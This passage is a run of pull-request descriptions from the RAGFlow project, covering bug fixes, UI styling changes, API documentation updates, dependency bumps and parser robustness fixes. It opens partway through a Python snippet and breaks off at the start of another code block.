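    # Look before you leap: test the shape instead of catching exceptions.
    if isinstance(resp, dict):
        usage = resp.get("usage")
    else:
        usage = getattr(resp, "usage", None)
    if usage is None:
        return 0
    if isinstance(usage, dict):
        return usage.get("total_tokens", 0)
    return getattr(usage, "total_tokens", 0)
```

In Python, raising and catching an exception costs more than a failed `if` test, so this style helps most when the missing-field case is common.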
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Optimize table style
- Modify the style of the table scrollbar and remove unnecessary
scrollbars
- Adjust the header style of the table, add background color and
hierarchy
- Optimize the style of datasets and file tables
- Add a new background color variable
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: When an uploaded file is deleted in the chat input box, the
corresponding file ID is not deleted #9701
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update API endpoint paths in docs from `/v1/` to `/api/v1/` for
consistency
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
This PR fixes a critical bug in the session listing endpoint where the
application crashes with an `AttributeError` when processing chunk data
that contains non-dictionary objects.
**Error before fix:**
```json
{
"code": 100,
"data": null,
"message": "AttributeError(\"'str' object has no attribute 'get'\")"
}
```
**Root cause:**
The code assumes all items in the `chunks` array are dictionary objects
and directly calls the `.get()` method on them. However, in some cases,
the chunks array contains string objects or other non-dictionary types,
causing the application to crash when attempting to call `.get()` on a
string.
**Solution:**
Added type validation to ensure each chunk is a dictionary before
processing. Non-dictionary chunks are safely skipped, preventing the
crash while maintaining functionality for valid chunk data.
This fix improves the robustness of the session listing endpoint and
ensures users can retrieve their conversation sessions without
encountering server errors due to data format inconsistencies.
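The type validation described above can be sketched roughly as follows. This is an illustration only, not the code from the PR; the function name and the `chunk_id` / `content` field names are hypothetical.

```python
from typing import Any


def collect_chunk_fields(chunks: list[Any]) -> list[dict[str, Any]]:
    """Keep only dictionary chunks and read their fields with .get()."""
    result = []
    for chunk in chunks:
        if not isinstance(chunk, dict):
            # Strings and other types have no .get(); skip them instead of crashing.
            continue
        result.append({
            "id": chunk.get("chunk_id"),
            "content": chunk.get("content"),
        })
    return result


mixed = [{"chunk_id": "c1", "content": "hello"}, "stray string", None]
print(collect_chunk_fields(mixed))
```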
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize dataset page layout and internationalization and Fix
setting default values for multi selection drop-down boxes #3221
- Adjust the style and layout of each component on the dataset page
- Add and update multilingual translation content
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When creating a conversation, the prologue is not saved in the
conversation.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Multiple conversations cause the reference list to grow
indefinitely due to Python's mutable default argument behavior.
Explicitly initialize reference as an empty list when creating new
sessions.
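For readers unfamiliar with the pitfall, here is a small standalone illustration. The function names are hypothetical and are not taken from the RAGFlow code.

```python
def new_session_buggy(message, reference=[]):
    # The default list is created once, when the function is defined,
    # so every call that omits `reference` shares the same list object.
    reference.append(message)
    return {"reference": reference}


def new_session_fixed(message, reference=None):
    # Create a fresh list per call when the caller does not pass one.
    if reference is None:
        reference = []
    reference.append(message)
    return {"reference": reference}


first = new_session_buggy("a")
second = new_session_buggy("b")
print(second["reference"])                # ['a', 'b']: state leaked across calls
print(new_session_fixed("a")["reference"])  # ['a']
print(new_session_fixed("b")["reference"])  # ['b']
```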
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Exclude operator_permission field from renaming chat fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The VersionDialog component was not receiving the correct context for
dropdown handling, causing improper behavior in its interactions.
This PR wraps VersionDialog in DropdownProvider to ensure it gets the
proper context and functions as expected.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Place the invitation reminder icon in a separate file #9634
Fix: After receiving the agent message, pull the agent data to highlight
the edges passed #9538
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Search app AI summary ERROR, and the tag set cannot be selected
#9649 #9652
- Search app AI summary ERROR: 'dict' object has no attribute 'split'
#9649
- Fix: The tag set cannot be selected in the knowledge base. #9652
- Added custom parameter options to the LlmSettingFieldItems component
- Adjusted the document preview height to improve page layout
adaptability
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Display the invited icon in the header #9634
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix search app AI summary ERROR: 'dict' object has no attribute 'split'.
#9649
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolve #9549 and #9436. In v0.20.x, the Agent completions API changed a
lot, for example responses no longer include the reference.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Document Previewer is not working #9606
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Use async/await to handle Redis when running RAPTOR.
### Type of change
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Removed a line break causing problems with execution in Raptor.
### What problem does this PR solve?
When I activate Raptor without changing anything in French, I encounter
a problem that I don't have with the English version. I noticed in the
logs that there was an extra line break, so I suggest removing it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where knowledge base could not be shared #9634
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The buttons at the bottom of the dataset settings page are not
visible on small screens #9638
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix(dataset): data form data acquisition logic
fix(next-chats): Optimize the chat settings interface and add language
selection
- Replace form.formControl.trigger with form.trigger
- Use form.getValues() instead of form.formState.values
- Add language selection to support multiple languages
- Add default chat settings values
- Add new settings: icon, description, knowledge base ID, etc.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fixes (web): Optimized search page style and functionality #3221
- Updated search page and view title styles
- Modified dataset list and multi-select control styles
- Optimized text field and button styles
- Updated filter button icons
- Adjusted metadata filter styles
- Added default descriptions for the smart assistant
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Bump infinity-sdk dependency to the latest development version
(0.6.0.dev5) in both pyproject.toml and uv.lock files to incorporate
recent changes and fixes from the SDK.
### Type of change
- [x] Other (please describe): Update deps
### What problem does this PR solve?
Feat: Allow users to parse documents directly after uploading files
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (style): Optimized Datasets color scheme and layout #3221
- Updated background and text colors for multiple components
- Adjusted some layout structures, such as the paging position of
dataset tables
- Unified status icons and color mapping
- Optimized responsive layout to improve compatibility across different
screen sizes
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Remove the file size and quantity restrictions of the upload
control #9613 #9598
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feature (web): Optimize dataset pages and segmented components #3221
- Add the activeClassName property to Segmented components to customize
the selected state style
- Update the icons and captions of the relevant components on the dataset
page
- Modify the parsing status column title of the dataset table
- Optimize the Segmented component style of the homepage application
section
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Expand the capabilities of the MCP Server. #8644.
Special thanks to @Drasek, this change is largely based on his original
implementation, it is super neat and well-structured to me. I basically
just integrated his code into the codebase with minimal modifications.
My main contribution is implementing a proper cache layer for dataset
and document metadata, using the LRU strategy with a 300s ± random 30s
TTL. The original code did not actually perform caching.
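A minimal sketch of an LRU cache with a jittered TTL, under the parameters mentioned above (300s ± 30s). The class name, method names, and the injectable `clock` are assumptions for illustration; the actual cache layer in the MCP server may be structured differently.

```python
import random
import time
from collections import OrderedDict


class TTLLRUCache:
    """LRU cache whose entries expire after ttl +/- jitter seconds."""

    def __init__(self, max_size=128, ttl=300.0, jitter=30.0, clock=time.monotonic):
        self.max_size = max_size
        self.ttl = ttl
        self.jitter = jitter
        self.clock = clock  # injectable so expiry can be tested without sleeping
        self._items = OrderedDict()  # key -> (expires_at, value)

    def set(self, key, value):
        # Randomizing the TTL spreads out expirations so entries cached
        # together do not all refresh at the same moment.
        expires_at = self.clock() + self.ttl + random.uniform(-self.jitter, self.jitter)
        self._items[key] = (expires_at, value)
        self._items.move_to_end(key)
        while len(self._items) > self.max_size:
            self._items.popitem(last=False)  # evict the least recently used entry

    def get(self, key, default=None):
        entry = self._items.get(key)
        if entry is None:
            return default
        expires_at, value = entry
        if self.clock() >= expires_at:
            del self._items[key]  # expired: drop and report a miss
            return default
        self._items.move_to_end(key)  # mark as most recently used
        return value
```

The random offset is one common way to avoid many entries expiring together and triggering a burst of refresh requests.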
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Caspar Armster <caspar@armster.de>
### What problem does this PR solve?
Feat: Updated some colors according to the design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (web): Optimize text display effect
- Add text ellipsis and overflow hidden classes to the HomeCard component
to achieve text overflow hiding and ellipsis effects
- Add text ellipsis and overflow hidden classes to the DatasetSidebar
component to improve the display of dataset names
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the save button at the bottom of the chat
page could not be displayed on small screens #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
In the **update assistant** request, passing an empty array `[]` for
`dataset_ids` triggers a misleading message "Dataset use different
embedding models", while omitting the field does not.
To fix this, we:
- Provide a default empty list: `ids = req.get("dataset_ids", [])`.
- Replace the `is not None` check with a truthy check: `if ids:`.
**Files changed**
`api/apps/sdk/chat.py`
- L153: `ids = req.get("dataset_ids")` → `ids = req.get("dataset_ids",
[])`
- L156: `if ids is not None:` → `if ids:`
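The difference between the two checks can be shown in isolation. The helper names below are hypothetical; only the `req.get(...)` expressions and the two conditions come from the change described above.

```python
def enters_check_before(req: dict) -> bool:
    # Old behaviour: an empty list is "not None", so the
    # embedding-model consistency check ran on zero datasets.
    ids = req.get("dataset_ids")
    return ids is not None


def enters_check_after(req: dict) -> bool:
    # New behaviour: default to [] and use a truthy check, so both a
    # missing key and an empty list skip the consistency check.
    ids = req.get("dataset_ids", [])
    return bool(ids)


for req in ({}, {"dataset_ids": []}, {"dataset_ids": ["kb1"]}):
    print(req, enters_check_before(req), enters_check_after(req))
```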
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix (web): Update the style of segmented controls and add metallic
texture gradients #3221
- Modified the selected state style of Segmented components, adding
metallic texture gradient and lower border
- Added a metallic gradient background image in tailwind.diag.js
- Added the `--metallic` variable in tailwind.css to define metallic
texture colors
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
In 0.19.0, reference is a list, and it should remain a list; otherwise
the last conversation's reference will be lost.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Make the old page accessible via URL #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.2 to v0.20.3
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where the model configuration page could not be
scrolled #9572
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix home card not responding to click events
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix (next search): Optimize the search problem interface and related
functions #3221
- Add search_id to the retrieval_test interface
- Optimize handleSearchStrChange and handleSearch callbacks to determine
whether to enable AI search based on search configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Reset all data except the first one on the chat page shared with
others #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where renaming a chat would create a new chat #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Switch the root route to the new page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (search): Search application list supports renaming function #3221
- Update the search application list page and add a renaming operation
entry
- Modify the search application details interface to support obtaining
detailed information
- Optimize search settings page layout and style
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.1 to v0.20.2
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where clicking the SQL tool test button did not
request the interface #9541
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Refactor OpenAI to enable audio parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Allow the Retrieval kb_ids param to use kb_id, and allow a list of
kb_name or kb_id.
- Add judgment on whether the knowledge base name is a list and support
batch queries
- When the knowledge base name does not exist, try using the ID for
querying
- If both query methods fail, throw an exception
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Move stop_event.wait(6) into finally block so that even when an
exception occurs, the loop still sleeps before retrying. This prevents
busy looping and excessive error logs when Redis connection fails.
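A sketch of the loop shape this describes, assuming a `threading.Event` named `stop_event`. The `do_work` callable and the function name are placeholders, not names from the codebase.

```python
import threading


def report_loop(stop_event: threading.Event, do_work, interval: float = 6.0) -> None:
    """Run do_work repeatedly, always pausing between attempts."""
    while not stop_event.is_set():
        try:
            do_work()
        except Exception as exc:
            # For example a failed Redis connection: log it and fall through.
            print(f"work failed: {exc}")
        finally:
            # Runs on success and on failure, so a persistent error cannot
            # turn the loop into a busy loop. wait() returns early once
            # stop_event is set, which keeps shutdown responsive.
            stop_event.wait(interval)
```

With the wait inside the `try` body after the work call, an exception would skip it and the loop would retry immediately.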
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow agent operators to select speech-to-text models #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(search): Optimized search functionality and user interface #3221
- Added similarity threshold adjustment function
- Optimized mind map display logic
- Adjusted search settings interface layout
- Fixed related search and document viewing functions
- Optimized time display and node selection logic
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update search_app.py to use SearchService instead of
KnowledgebaseService for duplicate
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the embedded page of the chat module #3221
Feat: Let the agent operator support the selection of tts model #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix Gemini parameters error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix (search): Optimize the search page functionality and UI #3221
- Add a search list component
- Implement search settings
- Optimize search result display
- Add related search functionality
- Adjust the search input box style
- Unify internationalized text
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add embedded search functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Update httpx dependency to include socks support in pyproject.toml
- Update lockfile with new socksio dependency
### Type of change
- [x] Update dependencies for proxy support
### What problem does this PR solve?
Feat: Fixed the chat model setting echo issue
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Use input length to prepare res
2. Adjust torch_empty_cache code location
### Type of change
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
There is a problem with the implementation of the Agent begin-form:
although the enablePrologue switch and the prologue input box are hidden
in Task mode, these values are still saved in the form data. If the user
first enables the opening and sets the content in Conversational mode,
and then switches to Task mode, these values will still be saved and may
be used in some scenarios.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(search): Added app embedding functionality and optimized search
page #3221
- Added an Embed App button and related functionality
- Optimized the layout and interaction of the search settings interface
- Adjusted the search result display method
- Refactored some code to support new features
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add SMTP support for user invitation emails
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Conversation completion can specify different model
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add metadata configuration for new chats #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Handle unexpected truncated Excel files.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Unified configuration format: All services now use the same image
configuration structure for consistency.
- Private registry support: Added imagePullSecrets to enable pulling
images from private registries.
- Per-service flexibility: Each service can override image-related
parameters independently.
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When requesting data over HTTP, if the JSON string returned by the
interface contains an unescaped backslash sequence like '\u', Python's
re module treats '\u' as a Unicode escape, but there is no valid 4-digit
hexadecimal number after it, so it raises an error:
re.error: bad escape \u at position 26
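The failure can be reproduced with a replacement string passed to `re.sub`. The sketch below shows one common way to avoid it (a function replacement, which is inserted verbatim); this is an assumption about a possible fix, not necessarily what this PR does, and `fill_placeholder` is a hypothetical helper.

```python
import re


def fill_placeholder(template: str, name: str, value: str) -> str:
    """Replace {name} in template with value, without escape processing."""
    pattern = r"\{" + re.escape(name) + r"\}"
    # A callable replacement is used as-is, so backslashes in `value`
    # are not interpreted as regex replacement escapes.
    return re.sub(pattern, lambda _match: value, template)


payload = r'{"path": "C:\users\demo"}'

try:
    # A plain string replacement is parsed for escapes, and "\u" is rejected.
    re.sub(r"\{payload\}", payload, "value: {payload}")
except re.error as exc:
    print(f"re.error: {exc}")

print(fill_placeholder("value: {payload}", "payload", payload))
```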
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete or filter conversations #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…e connecting line (#9226)
### What problem does this PR solve?
Can directly generate an agent node by dragging and dropping the
connecting line (#9226)
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
fix: preserve correct MIME & unify data URL handling for vision inputs
(relates #9248)
- Updated image2base64() to return a full data URL
(data:image/<fmt>;base64,...) with accurate MIME
- Removed hardcoded image/jpeg in Base._image_prompt(); pass through
data URLs and default raw base64 to image/png
- Set AnthropicCV._image_prompt() raw base64 media_type default to
image/png
- Ensures MIME type matches actual image content, fixing “cannot process
base64 image” errors on vLLM/OpenAI-compatible backends
### What problem does this PR solve?
This PR fixes a compatibility issue where base64-encoded images sent to
vision models (e.g., vLLM/OpenAI-compatible backends) were rejected due
to mismatched MIME type or incorrect decoding.
Previously, the backend:
- Always converted raw base64 into data:image/jpeg;base64,... even if
the actual content was PNG.
- In some cases, base64 decoding was attempted on the full data URL
string instead of the pure base64 part.
This caused errors like:
```
cannot process base64 image
failed to decode base64 string: illegal base64 data at input byte 0
```
by strict validators such as vLLM.
With this fix, the MIME type in the request now matches the actual image
content, and data URLs are correctly handled or passed through, ensuring
vision models can decode and process images reliably.
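A rough sketch of the handling described above, not the actual `image2base64()` or `_image_prompt()` code. The helper names and the signature table are assumptions: raw bytes are sniffed by magic number, existing data URLs pass through, and raw base64 text defaults to `image/png`.

```python
import base64

# Leading bytes of a few common image formats.
_SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
]


def sniff_mime(raw: bytes, default: str = "image/png") -> str:
    """Guess the MIME type from the leading bytes of the image."""
    for signature, mime in _SIGNATURES:
        if raw.startswith(signature):
            return mime
    return default


def to_data_url(image) -> str:
    """Accept raw bytes, raw base64 text, or an existing data URL."""
    if isinstance(image, str):
        if image.startswith("data:"):
            return image  # already a data URL: pass through untouched
        return f"data:image/png;base64,{image}"  # raw base64: default MIME
    encoded = base64.b64encode(image).decode("ascii")
    return f"data:{sniff_mime(image)};base64,{encoded}"


print(to_data_url(b"\x89PNG\r\n\x1a\n" + b"\x00" * 4)[:22])
```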
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Send data to compare the performance of different models' answers
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Agent template: report agent using knowledge base
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(next-search): Implements document preview functionality
- Adds a new document preview modal component
- Implements document preview page logic
- Adds document preview-related hooks
- Optimizes document preview rendering logic
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The KB folder may not exist when creating a virtual file. #9423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display a separate chat multi-model comparison page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Make `session_id` optional and add `inputs` parameter
- Remove deprecated `sync_dsl` parameter
- Update request/response examples to match current API behavior
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Update broken create agent session due to v0.20.0 changes. #9383
**NOTE: A session ID is no longer required to interact with the agent.**
See: #9241, #9309.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Show multiple chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add `url`, `doc_type`, and `created_at` fields to the API response
example in the documentation.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Fixed the issue where some fields in the chat configuration could
not be displayed #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow setting multiple types of default models in the service config.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Add type and boundary checks for conv["reference"] access
- Prevent KeyError: 0 when reference list is empty or malformed
- Ensure reference is list type before indexing
- Handle cases where reference items are None or missing chunks
- Maintains backward compatibility with existing data structures
This resolves crashes in /api/v1/agents/<agent_id>/sessions endpoint
when conversation reference data is not properly structured.
### What problem does this PR solve?
This PR fixes a critical `KeyError: 0` that occurs in the
`/api/v1/agents/<agent_id>/sessions` endpoint when the system attempts
to access conversation reference data that is not properly structured.
**Background Context:**
The `list_agent_session` method in `api/apps/sdk/session.py` assumes
that `conv["reference"]` is always a properly indexed list with valid
dictionary structures. However, in real-world scenarios, this data can
be:
- Not a list type (could be None, string, or other types)
- An empty list when `chunk_num` tries to access index 0
- Contains None values or malformed dictionary structures
- Missing expected "chunks" keys in reference items
**Impact Before Fix:**
When malformed reference data is encountered, the API crashes with:
```json
{
"code": 100,
"data": null,
"message": "KeyError(0)"
}
```
**Solution:**
Added comprehensive safety checks including type validation, boundary
checking, null safety, and structure validation to ensure the API
gracefully handles all reference data formats while maintaining backward
compatibility.
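The checks listed above might look roughly like this. It is a sketch under the assumption that each reference item is a dict with a `chunks` list; `safe_chunks` is a hypothetical helper, not the code in `list_agent_session`.

```python
def safe_chunks(conv: dict, index: int = 0) -> list:
    """Return the chunk dicts at conv["reference"][index], or [] if malformed."""
    reference = conv.get("reference")
    # Type and boundary checks: a dict here is what produces KeyError: 0.
    if not isinstance(reference, list) or not (0 <= index < len(reference)):
        return []
    item = reference[index]
    # Null safety and structure validation for the reference item.
    if not isinstance(item, dict):
        return []
    chunks = item.get("chunks")
    if not isinstance(chunks, list):
        return []
    return [chunk for chunk in chunks if isinstance(chunk, dict)]


print(safe_chunks({"reference": {}}))                        # []
print(safe_chunks({"reference": [{"chunks": [{"id": 1}]}]}))  # [{'id': 1}]
```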
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Change return type of _generate_streamly from str to Generator[str,
None, None] to properly type hint streaming responses.
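As a small illustration of the annotation (the function body here is a stand-in, not the real `_generate_streamly`):

```python
from collections.abc import Generator


def generate_streamly(parts: list[str]) -> Generator[str, None, None]:
    # Generator[YieldType, SendType, ReturnType]: this function yields str,
    # accepts nothing via send(), and returns nothing.
    for part in parts:
        yield part


stream = generate_streamly(["Hel", "lo"])
print("".join(stream))
```

Annotating the return type as `str` would mislead type checkers, since calling a function that contains `yield` returns a generator object rather than a string.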
### Type of change
- [x] Refactoring
### What problem does this PR solve?
When the begin component has an optional file that does not exist, it
raises an error.
### Type of change
- [x] Bug Fix
Co-authored-by: Popmio <zhengyihao036@gamil.com>
### What problem does this PR solve?
Feat: Added meta data to the chat configuration page #8531
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "File contains no valid workbook part"
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 54, in _load_excel_to_workbook
return RAGFlowExcelParser._dataframe_to_workbook(df)
File "/ragflow/deepdoc/parser/excel_parser.py", line 69, in _dataframe_to_workbook
ws.cell(row=row_num, column=col_num, value=value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/worksheet/worksheet.py", line 246, in cell
cell.value = value
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 218, in value
self._bind_value(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 197, in _bind_value
value = self.check_string(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 165, in check_string
raise IllegalCharacterError(f"{value} cannot be used in worksheets.")
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Before executing the SQL, remove tags in the format [ID: number] to
avoid execution errors.
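One way to strip such tags is a regular expression. The pattern below is an assumption about the exact tag format (optional whitespace after the colon, digits only) and `strip_id_tags` is a hypothetical name.

```python
import re

# Matches tags such as "[ID: 12]" or "[ID:3]".
_ID_TAG = re.compile(r"\[ID:\s*\d+\]")


def strip_id_tags(sql: str) -> str:
    """Remove [ID: number] tags from a SQL string before execution."""
    return _ID_TAG.sub("", sql).strip()


print(strip_id_tags("SELECT name FROM users [ID: 12]"))
```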
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wangyazhou <wangyazhou@sdibd.cn>
### What problem does this PR solve?
add fallback to `calamine` engine when parse error raised using the
default `openpyxl` / `xlrd` engine.
e.g. the following error can be fixed:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 53, in _load_excel_to_workbook
df = pd.read_excel(file_like_object)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 495, in read_excel
io = ExcelFile(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 1567, in __init__
self._reader = self._engines[engine](
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 46, in __init__
super().__init__(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 573, in __init__
self.book = self.load_workbook(self.handles.handle, engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 63, in load_workbook
return open_workbook(file_contents=data, **engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/__init__.py", line 172, in open_workbook
bk = open_workbook_xls(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 68, in open_workbook_xls
bk.biff2_8_load(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 641, in biff2_8_load
cd.locate_named_stream(UNICODE_LITERAL(qname))
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 398, in locate_named_stream
result = self._locate_stream(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 429, in _locate_stream
raise CompDocError("%s corruption: seen[%d] == %d" % (qname, s, self.seen[s]))
xlrd.compdoc.CompDocError: Workbook corruption: seen[2] == 4
```
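The fallback can be sketched as below. This is an illustration rather than the parser's actual code: `read_excel_with_fallback` and its `reader` parameter are hypothetical, and the `calamine` engine requires pandas 2.2 or later with the `python-calamine` package installed.

```python
import io


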